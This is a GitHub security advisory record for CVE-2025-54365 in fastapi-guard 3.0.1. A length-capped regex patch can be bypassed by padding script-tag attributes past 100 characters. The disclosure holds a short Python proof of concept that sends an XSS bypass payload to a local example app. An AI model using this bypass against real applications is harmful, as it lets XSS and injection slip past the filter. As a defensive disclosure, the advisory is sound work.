{"id":"GHSA-rrf6-pxg8-684g","summary":"FastAPI Guard has a regex bypass","details":"### Summary\n\nThe regular expression patched to mitigate the ReDoS vulnerability by limiting the length of string fails to catch inputs that exceed this limit.\n\n### Details\n\nIn version 3.0.1, you can find a commit like the one in the link below, which was made to prevent ReDoS.\nhttps://github.com/rennf93/fastapi-guard/commit/d9d50e8130b7b434cdc1b001b8cfd03a06729f7f\n\nThis commit mitigates the vulnerability by limiting the length of the input string, as shown in the example below.\n`r\"\u003cscript[^\u003e]*\u003e[^\u003c]*\u003c\\\\/script\\\\s*\u003e\"` -\u003e `\u003cscript[^\u003e]{0,100}\u003e[^\u003c]{0,1000}\u003c\\\\/script\\\\s{0,10}\u003e`\n\nThis type of patch fails to catch cases where the string representing the attributes of a \u003cscript\u003e tag exceeds 100 characters.\nTherefore, most of the regex patterns present in version 3.0.1 can be bypassed.\n\n### PoC\n\n1. clone the fastapi-guard repository\n2. Navigate to the examples directory and modify the main.py source code. Change the HTTP method for the root route from GET to POST.\n\u003cimg width=\"1013\" height=\"554\" alt=\"image\" src=\"https://github.com/user-attachments/assets/cf93ea37-2fd7-4251-abb6-b55f88685f54\" /\u003e\n3. After that, set up the example app environment by running the docker-compose up command. Then, run the Python code below to verify that the two requests return different results.\n\n```python\nimport requests\n\nURL = \"\u003chttp://localhost:8000\u003e\"\n\nobvious_payload = {\n    \"obvious\" : \"\u003cscript\u003ealert(1);\u003c/script\u003e\"\n}\nresponse = requests.post(url=URL, json=obvious_payload)\nprint(f\"[+] response of first request: {response.text}\")\n\nbypassed_payload = {\n    \"suspicious\" : f'\u003cscript id=\"i_can_bypass_regex_filtering{'a'*100}\"\u003ealert(1)\u003c/script\u003e'\n}\n\nresponse = requests.post(url=URL, json=bypassed_payload)\nprint(f\"[+] response of second request: {response.text}\")\n\n```\n\u003cimg width=\"836\" height=\"112\" alt=\"image\" src=\"https://github.com/user-attachments/assets/11dcccb2-6179-44b1-9628-ae0a787e3bb7\" /\u003e\n\n### Impact\n\nDue to this vulnerability, most of the regex patterns can potentially be bypassed, making the application vulnerable to attacks such as XSS and SQL Injection.","aliases":["CVE-2025-54365"],"modified":"2025-07-24T12:46:22Z","published":"2025-07-23T15:31:12Z","related":["CVE-2025-54365"],"database_specific":{"cwe_ids":["CWE-1333","CWE-185","CWE-20"],"nvd_published_at":"2025-07-23T23:15:24Z","github_reviewed":true,"severity":"HIGH","github_reviewed_at":"2025-07-23T15:31:12Z"},"references":[{"type":"WEB","url":"https://github.com/rennf93/fastapi-guard/security/advisories/GHSA-rrf6-pxg8-684g"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54365"},{"type":"WEB","url":"https://github.com/rennf93/fastapi-guard/commit/0829292c322d33dc14ab00c5451c5c138148035a"},{"type":"WEB","url":"https://github.com/rennf93/fastapi-guard/commit/d9d50e8130b7b434cdc1b001b8cfd03a06729f7f"},{"type":"PACKAGE","url":"https://github.com/rennf93/fastapi-guard"}],"affected":[{"package":{"name":"fastapi-guard","ecosystem":"PyPI","purl":"pkg:pypi/fastapi-guard"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"3.0.1"},{"fixed":"3.0.2"}]}],"versions":["3.0.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-rrf6-pxg8-684g/GHSA-rrf6-pxg8-684g.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:P"}]}